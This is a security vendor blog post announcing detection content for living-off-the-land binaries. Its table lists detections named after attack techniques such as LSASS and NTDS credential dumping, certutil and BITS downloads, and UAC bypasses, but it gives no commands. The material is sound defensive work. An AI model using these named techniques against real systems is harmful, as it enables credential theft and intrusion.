SECURITY

Living Off The Land: Threat Research February 2022 Release

In this February 2022 release, the Splunk Threat Research Team (STRT) focused on comparing currently created living off the land security content with Sigma and the LOLBas project. This provided a way for STRT to review current security content and identify any gaps. With the identified LOLBins that we did not have coverage for, we assessed the in the wild usage today and prioritized those over older novel LOLBins.

Here is a demo of Living Off The Land content:
 


In February we tagged 73 detections some of them brand new, distributed in a single Analytics Story. We also tagged all prior content with Living Off the Land. 

Focusing on Living Off The Land Binaries

Analytic stories are security use cases supported by our threat research team’s pre-built detections and responses. The following analytic stories focus on monitoring and investigating items that are related to Living Off The Land techniques. Living off the land plays an integral role in an adversaries playbook when landing in an environment. Instead of bringing in applications and new utilities, adversaries use utilities native to the operating system. This provides the adversary the ability to blend in better with native applications, providing flexibility in code execution and process behavior.

Detections Used in the Living Off The Land Analytic Stories

Living Off The Land Analytic Story

Name

Technique

Type

BITS Job Persistence

BITS Jobs

TTP

BITSAdmin Download File

BITS Jobs, Ingress Tool Transfer

TTP

CertUtil Download With URLCache and Split Arguments

Ingress Tool Transfer

TTP

CertUtil Download With VerifyCtl and Split Arguments

Ingress Tool Transfer

TTP

Certutil exe certificate extraction

None

TTP

CertUtil With Decode Argument

Deobfuscate/Decode Files or Information

TTP

CMD Carry Out String Command Parameter

Windows Command Shell, Command and Scripting Interpreter

Hunting

Control Loading from World Writable Directory

Signed Binary Proxy Execution, Control Panel

TTP

Creation of Shadow Copy with wmic and powershell

NTDS, OS Credential Dumping

TTP

Detect HTML Help Renamed

Signed Binary Proxy Execution, Compiled HTML File

Hunting

Detect HTML Help Spawn Child Process

Signed Binary Proxy Execution, Compiled HTML File

TTP 

Detect HTML Help URL in Command Line

Signed Binary Proxy Execution, Compiled HTML File

TTP

Detect HTML Help Using InfoTech Storage Handlers

Signed Binary Proxy Execution, Compiled HTML File

TTP

Detect mshta inline hta execution

Signed Binary Proxy Execution, Mshta

TTP 

Detect mshta renamed

Signed Binary Proxy Execution, Mshta

Hunting

Detect MSHTA Url in Command Line

Signed Binary Proxy Execution, Mshta

TTP

Detect Regasm Spawning a Process

Signed Binary Proxy Execution, Regsvcs/Regasm

TTP

Detect Regasm with Network Connection

Signed Binary Proxy Execution, Regsvcs/Regasm

TTP

Detect Regasm with no Command Line Arguments

Signed Binary Proxy Execution, Regsvcs/Regasm

TTP

Detect Regsvcs Spawning a Process

Signed Binary Proxy Execution, Regsvcs/Regasm

TTP

Detect Regsvcs with Network Connection

Signed Binary Proxy Execution, Regsvcs/Regasm

TTP

Detect Regsvcs with No Command Line Arguments

Signed Binary Proxy Execution, Regsvcs/Regasm

TTP

Detect Regsvr32 Application Control Bypass

Signed Binary Proxy Execution, Regsvr32

TTP

Detect Rundll32 Application Control Bypass - advpack

Signed Binary Proxy Execution, Rundll32

TTP

Detect Rundll32 Application Control Bypass - setupapi

Signed Binary Proxy Execution, Rundll32

TTP

Detect Rundll32 Application Control Bypass - syssetup

Signed Binary Proxy Execution, Rundll32

TTP

Detect Rundll32 Inline HTA Execution

Signed Binary Proxy Execution, Mshta

TTP

Disable Schedule Task

Disable or Modify Tools, Impair Defenses

TTP

Dump LSASS via comsvcs DLL

LSASS Memory, OS Credential Dumping

TTP

Esentutl SAM Copy

Security Account Manager, OS Credential Dumping

Hunting

Eventvwr UAC Bypass

Bypass User Account Control, Abuse Elevation Control Mechanism

TTP

MacOS LOLbin

Unix Shell, Command and Scripting Interpreter

TTP

Mmc LOLBAS Execution Process Spawn

Remote Services, Distributed Component Object Model

TTP

Mshta spawning Rundll32 OR Regsvr32 Process

Signed Binary Proxy Execution, Mshta

TTP

Ntdsutil Export NTDS

NTDS, OS Credential Dumping

TTP

Reg exe Manipulating Windows Services Registry Keys

Services Registry Permissions Weakness, Hijack Execution Flow

TTP

Regsvr32 Silent and Install Param Dll Loading

Signed Binary Proxy Execution, Regsvr32

Anomaly

Regsvr32 with Known Silent Switch Cmdline

Signed Binary Proxy Execution, Regsvr32

Anomaly

Remote WMI Command Attempt

Windows Management Instrumentation

TTP

Rundll32 Control RunDLL Hunt

Signed Binary Proxy Execution, Rundll32

Hunting

Rundll32 Control RunDLL World Writable Directory

Signed Binary Proxy Execution, Rundll32

TTP

Rundll32 Create Remote Thread To A Process

Process Injection

TTP

Rundll32 CreateRemoteThread In Browser

Process Injection

TTP

Rundll32 DNSQuery

Signed Binary Proxy Execution, Rundll32

TTP

Rundll32 Process Creating Exe Dll Files

Signed Binary Proxy Execution, Rundll32

TTP

Rundll32 Shimcache Flush

Modify Registry

TTP

RunDLL Loading DLL By Ordinal

Signed Binary Proxy Execution, Rundll32

TTP

Schedule Task with HTTP Command Arguments

Scheduled Task/Job

TTP

Schedule Task with Rundll32 Command Trigger

Scheduled Task/Job

TTP

Scheduled Task Creation on Remote Endpoint using At

Scheduled Task/Job, At (Windows)

TTP

Scheduled Task Deleted Or Created via CMD

Scheduled Task, Scheduled Task/Job

TTP

Scheduled Task Initiation on Remote Endpoint

Scheduled Task/Job, Scheduled Task

TTP

Schtasks scheduling job on remote system

Scheduled Task, Scheduled Task/Job

TTP

Services LOLBAS Execution Process Spawn

Create or Modify System Process, Windows Service

TTP

Suspicious IcedID Rundll32 Cmdline

Signed Binary Proxy Execution, Rundll32

TTP

Suspicious microsoft workflow compiler rename

Masquerading, Trusted Developer Utilities Proxy Execution, Rename System Utilities

Hunting

Suspicious microsoft workflow compiler usage

Trusted Developer Utilities Proxy Execution

TTP

Suspicious msbuild path

Masquerading, Trusted Developer Utilities Proxy Execution, Rename System Utilities, MSBuild

TTP

Suspicious MSBuild Rename

Masquerading, Trusted Developer Utilities Proxy Execution, Rename System Utilities, MSBuild

TTP

Suspicious MSBuild Spawn

Trusted Developer Utilities Proxy Execution, MSBuild

TTP

Suspicious mshta child process

Signed Binary Proxy Execution, Mshta

TTP

Suspicious mshta spawn

Signed Binary Proxy Execution, Mshta

TTP

Suspicious Regsvr32 Register Suspicious Path

Signed Binary Proxy Execution, Regsvr32

TTP

Suspicious Rundll32 dllregisterserver

Signed Binary Proxy Execution, Rundll32

TTP

Suspicious Scheduled Task from Public Directory

Scheduled Task, Scheduled Task/Job

Anomaly

Svchost LOLBAS Execution Process Spawn

Scheduled Task/Job, Scheduled Task

TTP

Windows Diskshadow Proxy Execution

Signed Binary Proxy Execution

TTP

Windows InstallUtil in Non Standard Path

Masquerading, Rename System Utilities, Signed Binary Proxy Execution, InstallUtil

TTP

Windows InstallUtil Remote Network Connection

InstallUtil, Signed Binary Proxy Execution

TTP

Windows InstallUtil Uninstall Option

InstallUtil, Signed Binary Proxy Execution

TTP

Windows InstallUtil Uninstall Option with Network

InstallUtil, Signed Binary Proxy Execution

TTP

Windows InstallUtil URL in Command Line

InstallUtil, Signed Binary Proxy Execution

TTP

WSReset UAC Bypass

Bypass User Account Control, Abuse Elevation Control Mechanism

TTP

 

Automating with SOAR Playbooks

All of the previously listed detections create entries in the risk index by default, and can be used seamlessly with risk notables and the Risk Notable Playbook Pack. The following community Splunk SOAR playbooks below can also be used in conjunction with some of the previously described analytics:

 

Playbook

Description

Internal Host SSH Investigate

Investigate an internal *nix host using SSH. This pushes a bash script to the endpoint and runs it, collecting generic information about the processes, user activity, and network activity. This includes the process list, login history, cron jobs, and open sockets. The results are zipped up in .csv files and added to the vault for an analyst to review.

Internal Host WinRM Investigate

Performs a general investigation on key aspects of a windows device using windows remote management. Important files related to the endpoint are generated, bundled into a zip, and copied to the container vault.

Delete Detected Files

This playbook acts upon events where a file has been determined to be malicious (ie webshells being dropped on an end host). Before deleting the file, we run a “more” command on the file in question to extract its contents. We then run a delete on the file in question.


Why Should You Care?

Living Off The Land binaries are nothing new, however they continue to be abused, as they provide expedite means of executing actions against compromised hosts without triggering  protections (LOLBins are native to operating system or downloaded from Microsoft). 

Many of these actions such as compiling or executing code, pass through execution, UAC bypass, file operations such as download, copy or upload among others can provide native tools for an attacker to operate through compromised hosts. It is important for analysts to have tools that provide them visibility and monitoring capabilities that can help address any possible threats from the abuse of living off the land binaries. 

For a full list of security content, check out the release notes on Splunk Docs

Learn more

You can find the latest content about security analytic stories on GitHub and in Splunkbase. Splunk Security Essentials also has all these detections now available via push update. 

Feedback

Any feedback or requests? Feel free to put in an issue on GitHub, and we’ll follow up. Alternatively, join us on the Slack channel #security-research. Follow these instructions If you need an invitation to our Splunk user groups on Slack.


Contributors

We would like to thank the whole threat research team Jose Hernandez, Teoderick Contreras, Rod Soto, Bhavin Patel, Mauricio Velazco, Michael Haag, Lou Stella, Eric McGinnis, and Patrick Bareiss for their contribution to this release.

 

The Splunk Threat Research Team is an active part of a customer’s overall defense strategy by enhancing Splunk security offerings with verified research and security content such as use cases, detection searches, and playbooks. We help security teams around the globe strengthen operations by providing tactical guidance and insights to detect, investigate and respond against the latest threats. The Splunk Threat Research Team focuses on understanding how threats, actors, and vulnerabilities work, and the team replicates attacks which are stored as datasets in the Attack Data repository

Our goal is to provide security teams with research they can leverage in their day to day operations and to become the industry standard for SIEM detections. We are a team of industry-recognized experts who are encouraged to improve the security industry by sharing our work with the community via conference talks, open-sourcing projects, and writing white papers or blogs. You will also find us presenting our research at conferences such as Defcon, Blackhat, RSA, and many more.


Read more Splunk Security Content

TAGS
Show All Tags
Show Less Tags